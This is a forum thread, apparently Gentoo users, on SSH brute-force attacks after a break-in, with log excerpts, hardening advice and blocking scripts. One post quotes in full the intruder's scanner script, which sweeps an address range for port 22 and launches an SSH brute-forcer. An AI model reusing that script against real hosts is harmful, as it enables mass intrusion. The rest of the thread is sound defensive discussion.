would still be in the log file?  Think again.  So when you look through all those logs and you see multiple attempts to gain root and no apparent success, remember the success might simply have been deleted, along with everything else that would leave trace.

Look into using remote logging if you can.

It all depends on what you are protecting, but at least lock the doors and windows when you go out.

----------

## xbmodder

here is my report so far:

ok this is pretty simple

he got a program "do.tgz" to probe for something

strace head -n 20:

```
execve("./do", ["./do"], [/* 46 vars */]) = 0
uname({sys="Linux", node="gallantweb", ...}) = 0
fcntl64(0, F_GETFD)                     = 0
fcntl64(1, F_GETFD)                     = 0
fcntl64(2, F_GETFD)                     = 0
geteuid32()                             = 1000
getuid32()                              = 1000
getegid32()                             = 100
getgid32()                              = 100
brk(0)                                  = 0x88a6000
brk(0x88a7000)                          = 0x88a7000
getuid32()                              = 1000
brk(0x88a9000)                          = 0x88a9000
munmap(0x88a9000, 3077926912)           = 0
brk(0x88aa000)                          = 0x88aa000
brk(0x88ab000)                          = 0x88ab000
brk(0x88ac000)                          = 0x88ac000
```

and the brk(0x...)                      = 0x...

continues forever, i believe this is probing ram for exploits or overflow or something...

the assh program seems to be a scanner for living computers...

hmmm ryo program no clue?!?

the hacker seems to be spanish hmmm...

the .access.log thing is == ryo

this is kinda weird, i used this account before and i left my bash's history at a lot higher. 500+ and some of it is missing...

clone did not work

cuz it need uid==0

miami.fl.us.undernet.org is the server he used, you could look at my files and try to look at the channel and see what u can do?

emech seems to be a IRC bot...

maybe a script kiddie thingy with the mysql thing. or not...

----------

## vdboor

This might be something interesting to make ssh more secure:

Set these settings in sshd_config:

```
Protocol 2       # only 2, removes support for protocol 1
PermitRootLogin no
AllowUsers (yourname here)
```

This makes sure no one gets ssh access except the few users you allow. (you can also use AllowGroups instead of AllowUsers to be more flexible)

There are some good tips in this howto.. anyone likes to make a gentoo-wiki "I got hacked howto"?   :Cool: 

edit: added comment.
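To check a box's actual file against these recommendations, here is a small sshd_config linter as an added example (my own code, not from the thread or from OpenSSH). It reads the global section of an sshd_config the way sshd does (keywords are case-insensitive, both "Keyword value" and "Keyword=value" are accepted, the first occurrence of a keyword wins) and reports when Protocol still lists 1, when PermitRootLogin is not "no", when neither AllowUsers nor AllowGroups is set, and, going one step beyond the post, when PasswordAuthentication is not "no". The two configuration texts are constructed, the user name alice is a placeholder, and Match blocks are assumed out of scope and skipped.

```python
"""Check an sshd_config for the settings recommended above, plus key-only auth.

Added example, not code from this thread or from OpenSSH. The two config
texts are constructed. Parsing follows sshd's rules as far as they matter
here: keywords are case-insensitive, "Keyword value" and "Keyword=value"
are both accepted, and the first occurrence of a keyword wins. Assumption:
only the global section is examined; parsing stops at the first Match block.
"""
import re

# Constructed sample: a default-ish config of the kind this thread is about.
WEAK_CONFIG = """\
# Protocol 1 still offered; root may log in; every account may be password-guessed.
Protocol 2,1
PermitRootLogin yes
#AllowUsers alice
PasswordAuthentication yes
"""

# Constructed sample: the settings recommended in the post above, plus key-only auth.
HARDENED_CONFIG = """\
Protocol 2
PermitRootLogin no
AllowUsers alice
PasswordAuthentication no
"""


def parse_sshd_config(text):
    """Return {lowercased keyword: value} for the global section of an sshd_config."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s+|\s*=\s*", line, maxsplit=1)  # "Key value" or "Key=value"
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break  # conditional block: out of scope for this checker
        settings.setdefault(key, value)  # first occurrence wins, as in sshd
    return settings


def audit_sshd_config(text):
    """Return a list of (keyword, problem) findings; an empty list means all checks pass."""
    s = parse_sshd_config(text)
    findings = []
    proto = s.get("protocol")
    if proto is not None and proto.replace(" ", "") != "2":
        findings.append(("Protocol", f"'{proto}' still offers SSH protocol 1; use 'Protocol 2'"))
    root = s.get("permitrootlogin", "(unset)")
    if root.lower() != "no":
        findings.append(("PermitRootLogin", f"is {root}; set 'PermitRootLogin no'"))
    if "allowusers" not in s and "allowgroups" not in s:
        findings.append(("AllowUsers",
                         "neither AllowUsers nor AllowGroups is set, so every account is a login target"))
    pw = s.get("passwordauthentication", "(unset)")
    if pw.lower() != "no":
        findings.append(("PasswordAuthentication",
                         f"is {pw}; with key-only logins a guessed password is useless"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_sshd_config(cfg) or "OK")
```

On OpenSSH releases that have dropped protocol 1 entirely the server ignores the Protocol keyword, so the first check only matters for installations of the age this thread discusses; the other three apply unchanged.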

----------

## Chewi

Cripes, I didn't expect to be a target but I just checked and there was an IRC bot trying very hard to get in just 3 days ago and there were a couple more attempts yesterday! This didn't used to happen to me but I'm now back in college on what I guess is a higher profile connection.

----------

## GenKreton

I get tens to hundreds of attempts a day from people on my ssh on my server at home which runs apache, unrealircd, and vsftpd. I realize hosting an irc server on a medium sized network puts me at a higher risk for hacking attempts. I am already behind a linksys wrt54g router, and running iptables just-in-case. With that said, I NEED ssh while I am at school to administer my server. Root is never allowed to login, and in fact, I do not permit password logins, only key based. So I am fairly confident in my security BUT I would like to slow these attempts down. 

Is there a simple way to allow one attempt every couple of minutes on only port 22?

----------

## z3ro

Perhaps that "assh" program stands for automated-ssh? So maybe it tried to connect to computers and attack them with pre-scripted commands.

----------

## xbmodder

zero no it scans compy here is a copy:

```
#!/bin/bash
if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi
echo "       Versiune de scaner privata!"
echo "----------------------------------------------------"
echo "           All my love for Liz!                     "
echo "----------------------------------------------------"
echo "# incep scanarea ..."
./pscan2 $1 22
sleep 10
cat $1.pscan.22 |sort |uniq > uniq.txt
oopsnr2=`grep -c . uniq.txt`
echo "# Am gasit $oopsnr2 de servere"
echo "----------------------------------------"
echo "# Incepem..."
./sshf 50
rm -rf $1.pscan.22 uniq.txt
echo "Asta a fost tot"
```

basically scans for working IPs with ssh that are hackable

----------

## mholtz

I've been seeing batches of ssh hack attempts like the following for the past month.  They come from a different IP each time, but the attempted username pattern is always the same, indicating a script.  This makes me wonder if the IPs which are attempting the attacks are already compromised.

```

Nov  5 09:22:57 [sshd] Failed password for nobody from 80.55.69.14 port 53986 ssh2

Nov  5 09:22:59 [sshd] Failed password for illegal user patrick from 80.55.69.14 port 33645 ssh2

Nov  5 09:23:00 [sshd] Failed password for illegal user patrick from 80.55.69.14 port 59775 ssh2

Nov  5 09:23:02 [sshd] Failed password for root from 80.55.69.14 port 50049 ssh2

Nov  5 09:23:04 [sshd] Failed password for root from 80.55.69.14 port 54201 ssh2

Nov  5 09:23:06 [sshd] Failed password for root from 80.55.69.14 port 39974 ssh2

Nov  5 09:23:08 [sshd] Failed password for root from 80.55.69.14 port 56309 ssh2

Nov  5 09:23:10 [sshd] Failed password for root from 80.55.69.14 port 51384 ssh2

Nov  5 09:23:12 [sshd] Failed password for illegal user rolo from 80.55.69.14 port 53286 ssh2

Nov  5 09:23:14 [sshd] Failed password for illegal user iceuser from 80.55.69.14 port 58738 ssh2

Nov  5 09:23:16 [sshd] Failed password for illegal user horde from 80.55.69.14 port 50973 ssh2

Nov  5 09:23:18 [sshd] Failed password for cyrus from 80.55.69.14 port 51924 ssh2

Nov  5 09:23:20 [sshd] Failed password for illegal user www from 80.55.69.14 port 33293 ssh2

Nov  5 09:23:27 [sshd] Failed password for illegal user wwwrun from 80.55.69.14 port 45285 ssh2

Nov  5 09:23:29 [sshd] Failed password for illegal user matt from 80.55.69.14 port 49633 ssh2

Nov  5 09:23:31 [sshd] Failed password for illegal user test from 80.55.69.14 port 58880 ssh2

Nov  5 09:23:33 [sshd] Failed password for illegal user test from 80.55.69.14 port 59901 ssh2

Nov  5 09:23:36 [sshd] Failed password for illegal user test from 80.55.69.14 port 43295 ssh2

Nov  5 09:23:38 [sshd] Failed password for illegal user test from 80.55.69.14 port 53466 ssh2

Nov  5 09:23:40 [sshd] Failed password for illegal user www-data from 80.55.69.14 port 45534 ssh2

Nov  5 09:23:42 [sshd] Failed password for mysql from 80.55.69.14 port 60840 ssh2

Nov  5 09:23:44 [sshd] Failed password for operator from 80.55.69.14 port 45907 ssh2

Nov  5 09:23:47 [sshd] Failed password for adm from 80.55.69.14 port 50406 ssh2

Nov  5 09:23:49 [sshd] Failed password for apache from 80.55.69.14 port 49007 ssh2

Nov  5 09:23:51 [sshd] Failed password for illegal user irc from 80.55.69.14 port 36609 ssh2

Nov  5 09:23:53 [sshd] Failed password for illegal user irc from 80.55.69.14 port 35043 ssh2

Nov  5 09:23:55 [sshd] Failed password for adm from 80.55.69.14 port 34949 ssh2

Nov  5 09:23:58 [sshd] Failed password for root from 80.55.69.14 port 43156 ssh2

Nov  5 09:24:00 [sshd] Failed password for root from 80.55.69.14 port 35519 ssh2

Nov  5 09:24:02 [sshd] Failed password for root from 80.55.69.14 port 52846 ssh2

Nov  5 09:24:04 [sshd] Failed password for illegal user jane from 80.55.69.14 port 44178 ssh2

Nov  5 09:24:06 [sshd] Failed password for illegal user pamela from 80.55.69.14 port 43102 ssh2

Nov  5 09:24:09 [sshd] Failed password for root from 80.55.69.14 port 42372 ssh2

Nov  5 09:24:11 [sshd] Failed password for root from 80.55.69.14 port 55090 ssh2

Nov  5 09:24:14 [sshd] Failed password for root from 80.55.69.14 port 43227 ssh2

Nov  5 09:24:15 [sshd] Failed password for root from 80.55.69.14 port 41264 ssh2

Nov  5 09:24:17 [sshd] Failed password for root from 80.55.69.14 port 47928 ssh2

Nov  5 09:24:19 [sshd] Failed password for illegal user cosmin from 80.55.69.14 port 46743 ssh2

Nov  5 09:24:21 [sshd] Failed password for root from 80.55.69.14 port 43489 ssh2

Nov  5 09:24:23 [sshd] Failed password for root from 80.55.69.14 port 41965 ssh2

Nov  5 09:24:25 [sshd] Failed password for root from 80.55.69.14 port 46024 ssh2

Nov  5 09:24:27 [sshd] Failed password for root from 80.55.69.14 port 50061 ssh2

Nov  5 09:24:29 [sshd] Failed password for root from 80.55.69.14 port 35590 ssh2

Nov  5 09:24:31 [sshd] Failed password for root from 80.55.69.14 port 48908 ssh2

Nov  5 09:24:33 [sshd] Failed password for root from 80.55.69.14 port 55080 ssh2

Nov  5 09:24:35 [sshd] Failed password for root from 80.55.69.14 port 52116 ssh2

Nov  5 09:24:37 [sshd] Failed password for root from 80.55.69.14 port 48554 ssh2

Nov  5 09:24:39 [sshd] Failed password for root from 80.55.69.14 port 40857 ssh2

Nov  5 09:24:40 [sshd] Failed password for root from 80.55.69.14 port 57402 ssh2

Nov  5 09:24:42 [sshd] Failed password for root from 80.55.69.14 port 57838 ssh2
Nov  5 09:24:44 [sshd] Failed password for root from 80.55.69.14 port 41711 ssh2
Nov  5 09:24:46 [sshd] Failed password for root from 80.55.69.14 port 58428 ssh2
Nov  5 09:24:48 [sshd] Failed password for root from 80.55.69.14 port 58584 ssh2
Nov  5 09:24:50 [sshd] Failed password for root from 80.55.69.14 port 35320 ssh2
Nov  5 09:24:52 [sshd] Failed password for root from 80.55.69.14 port 41857 ssh2
Nov  5 09:24:53 [sshd] Failed password for root from 80.55.69.14 port 42786 ssh2
Nov  5 09:24:55 [sshd] Failed password for root from 80.55.69.14 port 38851 ssh2
Nov  5 09:24:57 [sshd] Failed password for root from 80.55.69.14 port 46666 ssh2
Nov  5 09:24:59 [sshd] Failed password for root from 80.55.69.14 port 48532 ssh2
Nov  5 09:25:01 [sshd] Failed password for root from 80.55.69.14 port 32773 ssh2
Nov  5 09:25:03 [sshd] Failed password for root from 80.55.69.14 port 37715 ssh2
Nov  5 09:25:10 [sshd] Failed password for root from 80.55.69.14 port 48976 ssh2
Nov  5 09:25:11 [sshd] Failed password for root from 80.55.69.14 port 56698 ssh2
Nov  5 09:25:13 [sshd] Failed password for root from 80.55.69.14 port 36625 ssh2
Nov  5 09:25:15 [sshd] Failed password for root from 80.55.69.14 port 52868 ssh2
Nov  5 09:25:17 [sshd] Failed password for root from 80.55.69.14 port 54695 ssh2
Nov  5 09:25:19 [sshd] Failed password for root from 80.55.69.14 port 52670 ssh2
Nov  5 09:25:21 [sshd] Failed password for root from 80.55.69.14 port 53967 ssh2
Nov  5 09:25:23 [sshd] Failed password for root from 80.55.69.14 port 54874 ssh2
Nov  5 09:25:25 [sshd] Failed password for root from 80.55.69.14 port 53118 ssh2
Nov  5 09:25:26 [sshd] Failed password for root from 80.55.69.14 port 49851 ssh2
Nov  5 09:25:28 [sshd] Failed password for root from 80.55.69.14 port 45027 ssh2
Nov  5 09:25:30 [sshd] Failed password for root from 80.55.69.14 port 53901 ssh2
Nov  5 09:25:34 [sshd] Failed password for root from 80.55.69.14 port 57162 ssh2
Nov  5 09:25:35 [sshd] Failed password for illegal user cip52 from 80.55.69.14 port 35068 ssh2
Nov  5 09:25:37 [sshd] Failed password for illegal user cip51 from 80.55.69.14 port 49677 ssh2
Nov  5 09:25:39 [sshd] Failed password for root from 80.55.69.14 port 40956 ssh2
Nov  5 09:25:41 [sshd] Failed password for illegal user noc from 80.55.69.14 port 51422 ssh2
Nov  5 09:25:43 [sshd] Failed password for root from 80.55.69.14 port 34683 ssh2
Nov  5 09:25:44 [sshd] Failed password for root from 80.55.69.14 port 49075 ssh2
Nov  5 09:25:46 [sshd] Failed password for root from 80.55.69.14 port 51460 ssh2
Nov  5 09:25:48 [sshd] Failed password for root from 80.55.69.14 port 40586 ssh2
Nov  5 09:25:50 [sshd] Failed password for illegal user webmaster from 80.55.69.14 port 47403 ssh
Nov  5 09:25:52 [sshd] Failed password for illegal user data from 80.55.69.14 port 56472 ssh2
Nov  5 09:25:54 [sshd] Failed password for illegal user user from 80.55.69.14 port 60850 ssh2
Nov  5 09:25:56 [sshd] Failed password for illegal user user from 80.55.69.14 port 44799 ssh2
Nov  5 09:25:58 [sshd] Failed password for illegal user user from 80.55.69.14 port 49113 ssh2
Nov  5 09:25:59 [sshd] Failed password for illegal user web from 80.55.69.14 port 39841 ssh2
Nov  5 09:26:01 [sshd] Failed password for illegal user web from 80.55.69.14 port 42015 ssh2
Nov  5 09:26:03 [sshd] Failed password for illegal user oracle from 80.55.69.14 port 40639 ssh2
Nov  5 09:26:05 [sshd] Failed password for illegal user sybase from 80.55.69.14 port 52801 ssh2
Nov  5 09:26:07 [sshd] Failed password for illegal user master from 80.55.69.14 port 51732 ssh2
Nov  5 09:26:09 [sshd] Failed password for illegal user account from 80.55.69.14 port 40949 ssh2
Nov  5 09:26:10 [sshd] Failed password for illegal user backup from 80.55.69.14 port 50551 ssh2
Nov  5 09:26:13 [sshd] Failed password for illegal user server from 80.55.69.14 port 37708 ssh2
Nov  5 09:26:14 [sshd] Failed password for illegal user adam from 80.55.69.14 port 41895 ssh2
Nov  5 09:26:16 [sshd] Failed password for illegal user alan from 80.55.69.14 port 37845 ssh2
Nov  5 09:26:18 [sshd] Failed password for illegal user frank from 80.55.69.14 port 56533 ssh2
Nov  5 09:26:20 [sshd] Failed password for illegal user george from 80.55.69.14 port 58624 ssh2
Nov  5 09:26:22 [sshd] Failed password for illegal user henry from 80.55.69.14 port 37165 ssh2
Nov  5 09:26:24 [sshd] Failed password for illegal user john from 80.55.69.14 port 35399 ssh2
Nov  5 09:26:25 [sshd] Failed password for root from 80.55.69.14 port 36536 ssh2
Nov  5 09:26:27 [sshd] Failed password for root from 80.55.69.14 port 54497 ssh2
Nov  5 09:26:29 [sshd] Failed password for root from 80.55.69.14 port 38130 ssh2
Nov  5 09:26:30 [sshd] Failed password for root from 80.55.69.14 port 52827 ssh2
Nov  5 09:26:32 [sshd] Failed password for root from 80.55.69.14 port 43692 ssh2
Nov  5 09:26:34 [sshd] Failed password for illegal user test from 80.55.69.14 port 42997 ssh2
```

----------

## Anime_Fan

```
grep sshd /var/log/messages | grep "Failed password for root" | grep "Nov  3" | wc
```

Gives me 833 attempts. This was all within a 30-minute span from a single IP (a.dns.kr. inverse.nic.or.kr.) ... *Sigh*. So this is what my precious bandwidth is spent on.

Most of the attacks on me are on the root user (not permitted to log in); however, some attacks seem to have picked users from that machine's /etc/passwd (some oracle, some normal English names, some www/test/whatever).

Oh well. I guess it's time to research portknocking.

----------

## Mit

I got a load of these, noticed it's started using other usernames too (patrick, iceuser, illegal, cyrus, www, wwwrun, matt, mysql, operator, adm, apache, irc, jane, pamela, cosmin, cip51, cip51, noc, webmaster, web, oracle, sybase, master, account, backup, server, adam, alan, frank, george, henry, john, admin)

as well as the standard NOUSER, test, user and root (rather a lot)

Annoyingly I can't lock SSH access to certain IPs due to using dynamic IPs

----------

## braverock

 *Mben wrote:*   

> after reading this tread i took a look at my logs and found that i too had been probed. is there any way to report this?

 

I use the excellent logwatch and logcheck scripts, both of which are in portage.

I also use portsentry to shut down regular port scans, but this isn't a port scan.  

I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 

  - Brian

----------

## buzzin

I find running SSH on a non-standard high port stops bots picking it up... Using this along with portsentry stops people portscanning to find the new port too. 

Get portsentry to listen on 22 once you have moved ssh to another port and these bots can be added to an automatic iptables drop rule.

----------

## TurkisH

 *vdboor wrote:*   

> This might be something interesting to make ssh more secure:
> 
> Set these settings in sshd_config:
> 
> ```
> ...

 

Thanks for this one; having added AllowUsers and PermitRootLogin no gives me a safer feeling! I of course also had some SSH attempts:

```
Nov  4 15:43:41 [sshd] Illegal user frank from 210.233.67.132
Nov  4 15:43:41 [sshd] error: Could not get shadow information for NOUSER
Nov  4 15:43:41 [sshd] Failed password for illegal user frank from 210.233.67.132 port 37266 ssh2
Nov  4 15:43:43 [sshd] Illegal user george from 210.233.67.132
Nov  4 15:43:43 [sshd] error: Could not get shadow information for NOUSER
Nov  4 15:43:43 [sshd] Failed password for illegal user george from 210.233.67.132 port 37343 ssh2
Nov  4 15:43:45 [sshd] Illegal user henry from 210.233.67.132
Nov  4 15:43:45 [sshd] error: Could not get shadow information for NOUSER
Nov  4 15:43:45 [sshd] Failed password for illegal user henry from 210.233.67.132 port 37783 ssh2
Nov  4 15:43:48 [sshd] Illegal user john from 210.233.67.132
Nov  4 15:43:48 [sshd] error: Could not get shadow information for NOUSER
```

and it continues and continues  :Smile: 

btw what does "Could not get shadow information for NOUSER" mean?

----------

## vdboor

 *TurkisH wrote:*   

> what does "Could not get shadow information for NOUSER" mean?

 

I guess it can't find that entry in /etc/shadow, your shadow password file.

About the sshd_config stuff, changing the protocol line to "Protocol 2" (removing 1) makes it more secure as well, because ssh1 has an insecure design to start with.

 *Mit wrote:*   

> Annoyingly I can't lock SSH access to certain IPs due to using dynamic IPs

 

But I guess these dynamic IPs appear in the same network range each time, so you could allow that entire range? Hope it helps  :Smile: 

 *braverock wrote:*   

> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 

 

What about adding a syslog-ng rule to redirect these messages to a separate file? If you use flags(final), syslog-ng won't store these messages in other files as well. I guess you could use "grep" from a cronjob to parse these IP addresses regularly, and update a special drop-chain with iptables.

edit: I just checked my log files, and it appears I'm having ssh attacks as well..  :Sad:  Unfortunately, I can't find an IP address in my logs, does anyone know what setting I need to change for that? I'm using syslog-ng.

----------

## Mit

I'm using Metalog, so for me they appear in /var/log/sshd/current (etc.)

As for dynamic: it's possible for me here at uni, but then I'd hit a stumbling block with a couple of other places I use (they have 4 or 5 ranges and are a bit all over the place).

If I get a chance, I'm gonna write something to parse the logs, add iptables rules and email me. This however is coursework permitting.

----------

## dsegel

 *braverock wrote:*   

> 
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 
> 
>   - Brian

 

You'd better also hope that the script allows at least 2 failed attempts or you'll find yourself locked out the first time you type your username or password wrong by accident.

----------

## Redeeman

I get a lot of those login attempts too  :Smile:  with various usernames..

What I don't understand is why they feel it's worth it; I mean, obviously a lot of people must have those crappy test/test accounts

----------

## DaveHope

Been looking into this, and it appears that there's an IRC channel full of these drones. (Machines which have been hacked, and are running a client which leaves them in an IRC channel). Not 100% yet, but am looking into it. I'm also tempted to setup a small honeypot and let them play for as long as need be.

----------

## madmango

Please. I wasn't getting any of these attacks until I was an idiot and pinged one of the addresses. Now I'm getting brute-forced all the time. Nobody's gotten in though.

Has somebody looked into WHEN these attacks are occurring? I get scanned around 7:10 PM (GMT-5).

Logs:

```
Nov  9 19:00:06 10.152.3.1 sshd[13095]: Did not receive identification string from 220.95.232.52
Nov  9 19:03:04 10.152.3.1 syslog-ng[6432]: STATS: dropped 90
Nov  9 19:06:14 10.152.3.1 sshd[13100]: Illegal user patrick from 220.95.232.52
Nov  9 19:06:16 10.152.3.1 sshd[13102]: Illegal user patrick from 220.95.232.52
Nov  9 19:06:28 10.152.3.1 sshd[13114]: Illegal user rolo from 220.95.232.52
Nov  9 19:06:31 10.152.3.1 sshd[13116]: Illegal user iceuser from 220.95.232.52
Nov  9 19:06:33 10.152.3.1 sshd[13118]: Illegal user horde from 220.95.232.52
Nov  9 19:06:37 10.152.3.1 sshd[13122]: Illegal user www from 220.95.232.52
Nov  9 19:06:39 10.152.3.1 sshd[13124]: Illegal user wwwrun from 220.95.232.52
Nov  9 19:06:41 10.152.3.1 sshd[13126]: Illegal user matt from 220.95.232.52
Nov  9 19:06:43 10.152.3.1 sshd[13128]: Illegal user test from 220.95.232.52
Nov  9 19:06:45 10.152.3.1 sshd[13130]: Illegal user test from 220.95.232.52
Nov  9 19:06:47 10.152.3.1 sshd[13132]: Illegal user test from 220.95.232.52
Nov  9 19:06:49 10.152.3.1 sshd[13134]: Illegal user test from 220.95.232.52
Nov  9 19:06:51 10.152.3.1 sshd[13136]: Illegal user www-data from 220.95.232.52
Nov  9 19:07:01 10.152.3.1 sshd[13146]: Illegal user irc from 220.95.232.52
Nov  9 19:07:03 10.152.3.1 sshd[13148]: Illegal user irc from 220.95.232.52
Nov  9 19:07:13 10.152.3.1 sshd[13158]: Illegal user jane from 220.95.232.52
Nov  9 19:07:15 10.152.3.1 sshd[13160]: Illegal user pamela from 220.95.232.52
Nov  9 19:07:27 10.152.3.1 sshd[13172]: Illegal user cosmin from 220.95.232.52
Nov  9 19:08:44 10.152.3.1 sshd[13248]: Illegal user cip52 from 220.95.232.52
Nov  9 19:08:46 10.152.3.1 sshd[13250]: Illegal user cip51 from 220.95.232.52
Nov  9 19:08:50 10.152.3.1 sshd[13254]: Illegal user noc from 220.95.232.52
Nov  9 19:09:00 10.152.3.1 sshd[13264]: Illegal user webmaster from 220.95.232.52
Nov  9 19:09:02 10.152.3.1 sshd[13266]: Illegal user data from 220.95.232.52
Nov  9 19:09:04 10.152.3.1 sshd[13268]: Illegal user user from 220.95.232.52
Nov  9 19:09:06 10.152.3.1 sshd[13270]: Illegal user user from 220.95.232.52
Nov  9 19:09:08 10.152.3.1 sshd[13272]: Illegal user user from 220.95.232.52
Nov  9 19:09:10 10.152.3.1 sshd[13274]: Illegal user web from 220.95.232.52
Nov  9 19:09:12 10.152.3.1 sshd[13276]: Illegal user web from 220.95.232.52
Nov  9 19:09:14 10.152.3.1 sshd[13278]: Illegal user oracle from 220.95.232.52
Nov  9 19:09:16 10.152.3.1 sshd[13280]: Illegal user sybase from 220.95.232.52
Nov  9 19:09:18 10.152.3.1 sshd[13282]: Illegal user master from 220.95.232.52
Nov  9 19:09:20 10.152.3.1 sshd[13284]: Illegal user account from 220.95.232.52
Nov  9 19:09:22 10.152.3.1 sshd[13286]: Illegal user backup from 220.95.232.52
Nov  9 19:09:24 10.152.3.1 sshd[13288]: Illegal user server from 220.95.232.52
Nov  9 19:09:26 10.152.3.1 sshd[13290]: Illegal user adam from 220.95.232.52
Nov  9 19:09:28 10.152.3.1 sshd[13292]: Illegal user alan from 220.95.232.52
Nov  9 19:09:30 10.152.3.1 sshd[13294]: Illegal user frank from 220.95.232.52
Nov  9 19:09:32 10.152.3.1 sshd[13296]: Illegal user george from 220.95.232.52
Nov  9 19:09:34 10.152.3.1 sshd[13298]: Illegal user henry from 220.95.232.52
Nov  9 19:09:36 10.152.3.1 sshd[13300]: Illegal user john from 220.95.232.52
```

the list goes on.

Notice he's first portscanning my port 22 to ask if I've got a server up.

----------

## befa

If you wanna be more secure, edit your sshd_config and put that in:

```
ListenAddress 192.168.0.1
```

I mean the IP address of the interface facing your network...

omg! my English...forgive me....

----------

## unicolet

 *revertex wrote:*   

> 
> 
> -edit your sshd_config, disallow passwordless logins, root logins, and if possible allow login only for one user or group.
> 
> 

 

I would suggest disabling ssh protocol version 1 too. It is insecure and flawed.

 *revertex wrote:*   

> 
> 
> -install something like chkrootkit, integrit, snort, configure once and run forever, no excuses.
> 
> 

 

Reinstall chkrootkit after you think you have been rooted. Do not use a single rootkit checker. Try http://www.rootkit.nl/projects/rootkit_hunter.html too.

aide is an excellent Open Source tool (works like tripwire) for detecting less evident intrusions than yours. Configuration is easy and will check the integrity of your filesystem. Keep the database, config and binary in read-only media (like a floppy or a cdrom).

Logwatch is a tool that will allow you to monitor your log files and deliver daily/hourly/5mins reports into your mail. Once upon a time there was the great logcheck. If you find a copy of that use logcheck, it is MUCH better even though it can be quite verbose.

run

```
netstat -lnp
```

as root and disable all unnecessary services (usually all those you don't know what they are for)

And yes, install a firewall (even MS got this by now...   :Wink:  )

----------

## vdboor

 *dsegel wrote:*   

>  *braverock wrote:*   
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 
> 
>   - Brian 
> ...

 

Perhaps this is a start:

```
#!/bin/sh
# Print the unique source addresses behind "illegal user" password failures,
# leaving out anything from loopback. Adjust the log path to your syslog setup.
grep "Failed password for illegal user" /var/log/current/info.auth \
 | sed -e 's/.*user [^\ ]\+ from //'  -e 's/ port.*//'             \
 | sort \
 | uniq \
 | grep -v '^127\.0\.0'
```

I visited a Linux security workshop once, and I've been told there are standard (spam) blacklists available on the Internet somewhere. That sysadmin blocked new IP addresses for 3 days, and if they appeared more often on these spammer lists, he eventually blocked them forever.

The reason for the 3 day block: e-mail servers try to deliver e-mail for 5 days, so blocking an IP for 3 days makes sure the e-mail server would eventually deliver the message if the IP got on the list by accident.

 *DaveHope wrote:*   

> Been looking into this, and it appears that there's an IRC channel full of these drones. (Machines which have been hacked, and are running a client which leaves them in an IRC channel). Not 100% yet, but am looking into it. I'm also tempted to setup a small honeypot and let them play for as long as need be.

 

Hmz.. reminds me of this: http://www.grc.com/dos/grcdos.htm
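
Taking vdboor's starting script above together with dsegel's warning that a legitimate user who mistypes a password must not be locked out, here is an added example that is not code from anyone in this thread. It counts failed sshd passwords per source address, strips the `::ffff:` prefix that sshd logs for IPv4 connections arriving on an IPv6 socket, skips a whitelisted range, and only emits an iptables DROP command for addresses that reach a threshold. The sample log lines (in the two syslog layouts posted here), the whitelist and the threshold are constructed for the example, and the commands are printed for review rather than executed:

```shell
#!/bin/sh
# Added example, not code from the thread. Counts failed sshd password attempts
# per source address and prints (does not run) a DROP rule for each address
# that reaches THRESHOLD. Sample log lines, WHITELIST and THRESHOLD are constructed.

THRESHOLD=3                       # allow a few honest typos before blocking
WHITELIST='^(127\.|192\.168\.)'   # never block loopback or the LAN (assumed ranges)

# Constructed sample in the two syslog layouts seen in this thread; the last
# line is a successful key login and must be ignored.
SAMPLE_LOG='Nov  5 09:24:42 [sshd] Failed password for root from 80.55.69.14 port 57838 ssh2
Nov  5 09:24:44 [sshd] Failed password for root from 80.55.69.14 port 41711 ssh2
Nov  5 09:25:35 [sshd] Failed password for illegal user cip52 from 80.55.69.14 port 35068 ssh2
Nov  9 19:06:14 sshd[13100]: Failed password for illegal user patrick from ::ffff:220.95.232.52 port 4000 ssh2
Nov  9 19:06:16 sshd[13102]: Failed password for illegal user rolo from ::ffff:220.95.232.52 port 4001 ssh2
Nov  9 19:10:00 sshd[13200]: Failed password for alice from 192.168.0.7 port 5000 ssh2
Nov  9 19:10:05 sshd[13201]: Failed password for alice from 192.168.0.7 port 5001 ssh2
Nov  9 19:10:09 sshd[13202]: Failed password for alice from 192.168.0.7 port 5002 ssh2
Nov  9 19:11:00 sshd[13203]: Failed password for illegal user test from 10.9.8.7 port 6000 ssh2
Nov  9 19:12:00 sshd[13204]: Accepted publickey for bob from 203.0.113.5 port 7000 ssh2'

# One address per line: every source with at least THRESHOLD failures,
# IPv4-mapped "::ffff:" prefix removed, whitelisted ranges dropped.
offenders() {
    printf '%s\n' "$SAMPLE_LOG" \
      | grep 'sshd.*Failed password for' \
      | sed -e 's/.* from //' -e 's/ port .*//' -e 's/^::ffff://' \
      | grep -Ev "$WHITELIST" \
      | sort | uniq -c \
      | awk -v t="$THRESHOLD" '$1 >= t { print $2 }'
}

# The firewall commands an operator would review before feeding them to a
# firewall script; nothing here touches iptables.
drop_rules() {
    offenders | while read -r ip; do
        printf 'iptables -A INPUT -s %s/32 -j DROP\n' "$ip"
    done
}

drop_rules
```

With the sample above only 80.55.69.14 reaches three failures: the two `::ffff:` attempts stay under the threshold, and the LAN user who mistyped three times is protected by the whitelist. To run it against a real log, replace the `printf` of `SAMPLE_LOG` with `cat` of the file vdboor's script reads.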

----------

## oog

I read through this whole thread and while I think I'm doing the right things to secure my ssh connections (I use a key, disabled root logins, enabled only my own account, turned off all other forms of authentication), I still haven't found a way to force a person to wait for a period of time before they can try another ssh connection. I saw a number of people suggest that in this thread. Does someone know how to do this?

----------

## GenKreton

 *oog wrote:*   

> I read through this whole thread and while I think I'm doing the right things to secure my ssh connections (I use a key, disabled root logins, enabled only my own account, turned off all other forms of authentication), I still haven't found a way to force a person to wait for a period of time before they can try another ssh connection. I saw a number of people suggest that in this thread. Does someone know how to do this?

 

I have searched very briefly for an acceptable way of doing this, it would be very useful to have it as an option in sshd itself.

----------

## revertex

I changed the default ssh port (22) to a higher port (2222).

Now the only connection attempts that I see in my logs are mine.

